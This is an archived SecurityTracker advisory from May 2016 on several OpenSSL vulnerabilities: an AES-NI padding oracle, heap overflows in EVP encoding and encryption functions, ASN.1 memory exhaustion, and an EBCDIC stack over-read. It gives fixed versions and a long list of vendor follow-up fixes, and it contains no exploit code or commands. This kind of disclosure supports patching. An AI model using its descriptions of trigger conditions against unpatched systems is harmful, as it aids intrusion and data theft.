SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (VPN)  >   OpenSSL Vendors:   OpenSSL.org
OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
SecurityTracker Alert ID:  1035721
SecurityTracker URL:  http://securitytracker.com/id/1035721
CVE Reference:   CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2176   (Links to External Site)
Date:  May 3 2016
Impact:   Denial of service via local system, Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to versions 1.0.1t, 1.0.2h
Description:   Multiple vulnerabilities were reported in OpenSSL. A remote user can decrypt data in certain cases. A remote or local user can cause denial of service conditions. A remote user can obtain potentially sensitive information on the target system. A remote or local user may be able to execute arbitrary code on the target application using OpenSSL.

A remote user that can conduct a man-in-the-middle attack can conduct a padding oracle attack against data encrypted with an AES CBC cipher when the target server supports AES-NI to decrypt the data [CVE-2016-2107].

[Editor's note: This vulnerability was introduced in fix for a previous vulnerability known as the Lucky 13 padding attack (CVE-2013-0169).]

Juraj Somorovsky reported this vulnerability.

A remote or local user can supply specially crafted data to trigger an overflow in the EVP_EncodeUpdate() function and cause a heap corruption and cause the target application to crash or potentially execute arbitrary code [CVE-2016-2105]. Applications that call the affected PEM_write_bio* functions may be affected.

Guido Vranken reported this vulnerability.

A remote or local user can supply specially crafted data to trigger an overflow in the EVP_EncryptUpdate() function and cause a heap corruption and cause the target application to crash or potentially execute arbitrary code [CVE-2016-2106]. Applications that call the affected function may be affected.

Guido Vranken reported this vulnerability.

A remote or local user can supply specially crafted ASN.1 data to an application that reads data from a BIO using functions such as d2i_CMS_bio() to trigger a memory allocation error and consume excessive memory on the target system [CVE-2016-2109]. TLS applications are not affected.

Brian Carpenter reported this vulnerability.

An application can supply a specially crafted ASN.1 string longer than 1024 bytes to the X509_NAME_oneline() function on EBCDIC systems to trigger a memory over-read and return arbitrary stack data containing potentially sensitive information [CVE-2016-2176].

Guido Vranken reported this vulnerability.

Impact:   A remote user can decrypt traffic in certain cases.

A remote or local user may be able to execute arbitrary code on the target application that uses OpenSSL.

A remote or local user can cause denial of service conditions on the target system.

A remote user can obtain potentially sensitive information on the target system.

Solution:   The vendor has issued a fix (1.0.1t, 1.0.2h).

The vendor's advisory is available at:

https://www.openssl.org/news/secadv/20160503.txt

Vendor URL:  www.openssl.org/news/secadv/20160503.txt (Links to External Site)
Cause:   Access control error, Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 4 2016 (Ubuntu Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Ubuntu has issued a fix for Ubuntu Linux 12.04 LTS, 14.04 LTS, 15.10, and 16.04 LTS.
May 5 2016 (FreeBSD Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
FreeBSD has issued a fix for FreeBSD 9.3, 10.1, 10.2, and 10.3.
May 7 2016 (Cisco Issues Advisory for Cisco Unified MeetingPlace) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Unified MeetingPlace.
May 7 2016 (Cisco Issues Advisory for Cisco WebEx Meetings Server) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco WebEx Meetings Server 1.x and 2.x.
May 7 2016 (Cisco Issues Advisory for Cisco Jabber Guest) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Jabber Guest.
May 7 2016 (Cisco Issues Advisory for Cisco ASA Next-Generation Firewall Services) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco ASA Next-Generation Firewall Services.
May 7 2016 (Cisco Issues Advisory for Cisco Email Security Appliance/Cisco IronPort Encryption Appliance) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Email Security Appliance/Cisco IronPort Encryption Appliance.
May 9 2016 (Cisco Issues Advisory for Cisco WebEx Meeting Center) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco WebEx Meeting Center.
May 9 2016 (Cisco Issues Advisory for Cisco Network Analysis Module) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Network Analysis Module.
May 9 2016 (Cisco Issues Advisory for Cisco Prime Collaboration Deployment) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Prime Collaboration Deployment.
May 9 2016 (Cisco Issues Advisory for Cisco Prime Infrastructure Standalone Plug and Play Gateway) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Prime Infrastructure Standalone Plug and Play Gateway.
May 9 2016 (Cisco Issues Advisory for Cisco Digital Media Products) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Digital Media Products.
May 9 2016 (Cisco Issues Advisory for Cisco Prime Security Manager) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Prime Security Manager.
May 9 2016 (Cisco Issues Advisory for Cisco Show and Share) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Show and Share.
May 9 2016 (Cisco Issues Advisory for Cisco Connected Grid Products) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Connected Grid Products.
May 9 2016 (Cisco Issues Advisory for Cisco Nexus 1000V Series Switches) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Nexus 1000V Series Switches.
May 9 2016 (Cisco Issues Advisory for Cisco ATA Analog Telephone Adaptor) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco ATA 190 and 187 Analog Telephone Adaptors.
May 9 2016 (Red Hat Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Red Hat has issued a fix for Red Hat Enterprise Linux 7.
May 9 2016 (Cisco Issues Advisory for Cisco IP Phones) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco IP Phones.
May 9 2016 (CentOS Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
CentOS has issued a fix for CentOS 7.
May 9 2016 (Cisco Issues Advisory for Cisco Video Surveillance Camera) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Video Surveillance Cameras and Server.
May 9 2016 (Oracle Issues Fix for Oracle Linux) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Linux 7.
May 9 2016 (Cisco Issues Advisory for Cisco Media Experience Engine) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco Media Experience Engine MXE3500.
May 9 2016 (Cisco Issues Advisory for Cisco TelePresence) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Cisco has issued an advisory for Cisco TelePresence Server and VCS.
May 11 2016 (Pulse Secure Issues Advisory for Pulse Connect Secure) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Pulse Secure has issued an advisory for Pulse Connect Secure.
May 19 2016 (OpenBSD Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
OpenBSD has issued a fix for OpenBSD 5.8 and 5.9.
May 21 2016 (Citrix Issues Fix for Citrix XenServer) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Citrix has issued a fix for Citrix XenServer.
May 26 2016 (AttachmateWRQ Issues Fix for Attachmate Reflection for Secure IT) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
AttachmateWRQ has issued a fix for Attachmate Reflection for Secure IT.
May 26 2016 (HP Issues Advisory for HPE IceWall) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
HPE has issued an advisory for HPE IceWall.
May 31 2016 (Red Hat Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Red Hat has issued a fix for Red Hat Enterprise Linux 5.
Jun 1 2016 (Oracle Issues Fix for Oracle Linux) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Linux 5.
Jun 17 2016 (QNAP Systems Issues Fix for QNAP Storage Devices) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
QNAP Systems has issued a fix for QNAP Storage Devices.
Jun 21 2016 (IBM Issues Fix for IBM Proventia Network Enterprise Scanner) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Proventia Network Enterprise Scanner.
Jun 22 2016 (Oracle Issues Fix for Oracle Linux) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Linux 5.
Jul 6 2016 (IBM Issues Fix for IBM Tivoli Netcool Reporter) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Tivoli Netcool Reporter 2.2.
Jul 6 2016 (IBM Issues Fix for IBM Cognos Metric Manager) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Cognos Metric Manager.
Jul 8 2016 (IBM Issues Fix for IBM Security Identity Manager Virtual Appliance) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Security Identity Manager Virtual Appliance.
Jul 13 2016 (IBM Issues Fix for IBM AIX) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM AIX 5.3, 6.1, 7.1, and 7.2.
Jul 19 2016 (Apple Issues Fix for Apple macOS/OS X) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Apple has issued a fix for Apple macOS/OS X.
Jul 19 2016 (Oracle Issues Fix for MySQL) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for MySQL.
Jul 19 2016 (Oracle Issues Fix for Oracle Fusion Middleware [Oracle Exalogic Infrastructure and Oracle Access Manager]) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Fusion Middleware (Oracle Exalogic Infrastructure and Oracle Access Manager).
Aug 9 2016 (IBM Issues Fix for IBM Cognos TM1) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Cognos TM1.
Aug 19 2016 (Palo Alto Networks Issues Fix for Palo Alto PAN-OS) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Palo Alto Networks has issued a fix for Palo Alto PAN-OS.
Sep 13 2016 (IBM Issues Fix for IBM Rational Team Concert) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
IBM has issued a fix for IBM Rational Team Concert.
Oct 18 2016 (Red Hat Issues Fix) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Red Hat has issued a fix for Red Hat Enterprise Linux 6.7.
Oct 18 2016 (Oracle Issues Fix for Oracle E-Business Suite) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle E-Business Suite.
Oct 19 2016 (Oracle Issues Fix for Oracle Enterprise Manager) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Enterprise Manager.
Oct 19 2016 (Oracle Issues Fix for Oracle Health Sciences Applications) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Oracle has issued a fix for Oracle Health Sciences Applications.
Dec 15 2016 (Red Hat Issues Fix for Red Hat JBoss) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Red Hat has issued a fix for Red Hat JBoss for Red Hat Enterprise Linux.
Jan 26 2017 (Red Hat Issues Fix for Red Hat JBoss Core Services) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
Red Hat has issued a fix for Red Hat JBoss Core Services for Red Hat Enterprise Linux 6 and 7.
Feb 14 2017 (HPE Issues Fix for HPE Discovery & Dependency Mapping Inventory (DDMI)) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
HPE has issued a fix for HPE Discovery & Dependency Mapping Inventory (DDMI).
Apr 11 2017 (HPE Issues Fix for HPE Operations Agent) OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
HPE has issued a fix for HPE Operations Agent.



 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC